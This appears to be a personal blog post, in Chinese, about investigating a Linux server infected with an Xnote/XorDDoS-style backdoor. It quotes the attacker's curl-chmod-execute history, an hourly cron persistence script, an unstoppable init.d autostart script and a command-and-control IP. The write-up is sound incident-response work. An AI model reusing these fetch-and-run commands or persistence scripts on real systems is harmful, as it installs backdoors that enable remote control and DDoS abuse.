服务器遭受的一次攻击

服务器宕机了，没有办法ssh连上
没有办法，去机房，发现服务器仍然开着
查看最后执行的几条命令：

# 保存root用户的命令历史
history > history.log

# 最后的命令
curl ****/  /tmp/hei
chmod 744 hei
./hei

这里有几个问题：

• 查看了下载hei文件的ip地址，是江苏那一片的，但是我们的服务器，是内部使用的，外网无法访问

• 如果是正常的用户hei文件为什么会下载在/tmp文件夹

保存了history的历史之后，重启了服务器，但依旧ping不同，然后重启了网卡，好了

# 重启网卡
service network restart

一切刚刚开始。。。

从邮件开始

我以为就这样就结束了，但是。。。
某一天我发现，root用户老是收到一封邮件，有大概上两百封了，内容是相同的，我手动的将它们删掉了。

然而不久之后，我又收到了多封相同的邮件。。。

仔细看了邮件之后，明白了，是下面这条命令执行失败！

# 打开收件箱
mail

# 阅读邮件
& more 邮件标号

cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

/etc/cron.hourly

在此目录下发现了这个cron.sh文件

cd /etc/cron.hourly

# 查看文件的修改时间
stat cron.sh

etc/cron.hourly/cron.sh 文件内容

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`;do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

for循环这条命令很明显，就是重启所有的网卡。

查看了一下，并没有/lib/udev/udev 这个文件存在。所以cp这条命令总是失败，日志系统就起作用了，所以每小时就发送一封邮件给root账户。

删除这个文件之后，果然没有再发邮件了

我又以为结束了

不知道为什么/lib/udev/udev 这个文件消失了，难道是因为执行了了yum update命令更新了系统，导致这个文件没了？原因我并不知道。

然而，总之，没有再发邮件了。。。

命运的相逢，这是天意么

从网络命令开始

过了一段时间，想学一点网络的命令

当使用ss命令的时候，我突然发现了一条很奇怪的ip地址：

ss -p

# 敏感信息*代替了
SYN-SENT 0 1 *.*.*.*:50533  61.160.211.197:uaac users:(("654",21110,5))

多次执行的时候50533 这个端口会不断的改变
SYN-SENT
种种迹象表明，你的服务器在试图连接61.160.211.197:uaac

where are you

# 查找该ip对应的进程pid
netstat -p | less

# 查看对应进程的一些信息，起始时间
ps -aux | grep pid
# 查看进程对应的父进程
ps -ef | grep pid

# 杀死进程
kill -9 pid

然而，进程杀不死，过了几分钟又启动了

/etc/init.d

检查这个目录要仔细，注意隐藏文件
根据上面的stat的命令，以及系统宕机的时间，基本可以确定系统是在03月21号遭受到攻击的

# 查找在3/21号之后修改的文件
touch -t 201603210000.00 TT
find . -newer TT

# 或者直接使用ls，一个个的检索隐藏目录
ls -al

发现了一个可疑的文件.chinaz\{1458543822,内容如下：

#!/bin/sh
# chkconfig: 12345 90 90
# description: .chinaz{1458543822
### BEGIN INIT INFO
# Provides:             .chinaz{1458543822
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    .chinaz{1458543822
### END INIT INFO
case $1 in
start)
        /tmp/.chinaz{1458543822
        ;;
stop)
        ;;
*)
        /tmp/.chinaz{1458543822
        ;;
esac

可以看到这个服务是无法stop 的， 并且服务的脚本在/tmp 中，当我发现的时候，这个脚本已经没有了。不过在开机的时候应该会自动生成。
但是我们还是有收获的，这是一个开机自启动脚本，运行级别12345，运行序号90

最重要的是：我们获得了一个有意义的名字.chinaz{1458543822 ,它暴露了自己的真名！！！

在很久很久以前的魔法时代，任何一位谨慎的巫师都把自己的真名实姓看作最值得珍视的密藏，同时也是对自己生命的最大威胁 —— 文奇《真名实姓》

现身吧

摘自http://news.drweb.com/show/?i=9272&lng=en&c=5
To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor.
该网页介绍了该病毒，是Linux.BackDoor.Xnote.1的变种。

Linux.BackDoor.Xnote.1：
http://vms.drweb.com/virus/?_is=1&i=4323517

新的疑惑，一切远未结束。。。

这是你的真名么！

一款隐藏嵌入式Rookit的DDoS木马分析
http://www.freebuf.com/articles/system/58836.html

XorDDos家族：
http://www.aptno1.com/YC/102.html

https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html

Linux下随机10字符病毒的清除
http://blog.chinaunix.net/uid-20332519-id-4941140.html